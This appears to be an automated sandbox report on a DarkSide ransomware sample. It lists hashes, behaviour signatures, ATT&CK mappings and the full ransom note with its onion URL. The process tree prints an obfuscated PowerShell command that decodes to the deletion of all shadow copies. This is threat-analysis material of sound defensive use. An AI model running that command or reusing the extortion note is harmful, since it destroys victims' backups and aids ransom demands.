Overview

overview

10

Static

static

mal.exe

windows7_x64

10

mal.exe

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    360s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    25-01-2022 23:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mal.exe

  • Size

    512KB

  • MD5

    650d18a78f30302a1e10f664a0d2cb0a

  • SHA1

    c318776aefbd0156de1e6f7bba216d87e27c6341

  • SHA256

    2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615

  • SHA512

    cb209a8c381e99c8adf49a2ea1caa0732da0ad5891b7b244dcf8540d677a03b7e912b4e121c25440a5bbf855a112b8c0061f0974922154c6bdf11eb176bd3c57

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.82ee2099.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4 When you open our website, put the following data in the input form: Key: lsJTyyTnzJlGQ1I6sfwV6oVcXaRynwN6mWphA7BKXEDIHJcDlhNNHsrxlkpggRChK2nQ7wP0sknJvl37lbqElTopkUywK3QnfJFmqDBSCmFISeWSudjgwxB4kKSp7h4VySHeu4LmDiZXTAh1dbZHWxTtZ0bA6PhCoDrbGkctY4rucITW4IdYUZJC8d2B7SFnr5EA7EoRkajrZW54brM5Kgwqsz67qzH6Hk0Vr3EDcnGzNjGQBapJczIWkgPtMCJdTkeemQ34XH7wawXu3eOGV3uJlBZNoSuaxtDHMGApS8EWsUXhafMW8WxFLAPLCo6pdm7MLcLsVDp9iBXU1sLv2KkGyUJbO0KOmom9f1JREuidviHRfsndEgMFBAjyq5v4VEIraiioAbtWM7eecYaXPVt3rolsBi8mtjxLOpFj73NPPitoIDxBNfHGzXxvRTXi06Pjx9pRnAtjIqoq5wovnHa8uBel8nq8yDJTk7NWdGdsv3yVwV2TmBin7OvFqHN9lweFNJyuziKCVGEtSaglUNudMmpFnNObGlhfh58jQsrQiQZ2d3AOFsi !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 15 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mal.exe
    "C:\Users\Admin\AppData\Local\Temp\mal.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3732
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    5dc1c5e5f49d8a67a608b1f715ace841

    SHA1

    812f23c3fce094196e514f140702f69ba13aab1f

    SHA256

    d4df86e848e8eece19d9ec956704e488fe47de1df1a9d74dc2eba39ffdb39214

    SHA512

    ec232e6585f4c420076b634f8683dc0de1eaa29847efc398697f47313b1523d0f311d5dd35bb27e79e10ac807ccb5bdff220a66c35aaae82f3e4b13e517a5273

    Download Submit
  • memory/2812-115-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

    Download
  • memory/2812-117-0x0000000000030000-0x0000000000040000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2812-118-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

    Download
  • memory/3732-123-0x0000026698470000-0x0000026698492000-memory.dmp
    Filesize

    136KB

    Download
  • memory/3732-127-0x0000026698460000-0x0000026698462000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3732-128-0x0000026698463000-0x0000026698465000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3732-129-0x0000026698750000-0x00000266987C6000-memory.dmp
    Filesize

    472KB

    Download
  • memory/3732-141-0x0000026698466000-0x0000026698468000-memory.dmp
    Filesize

    8KB

    Download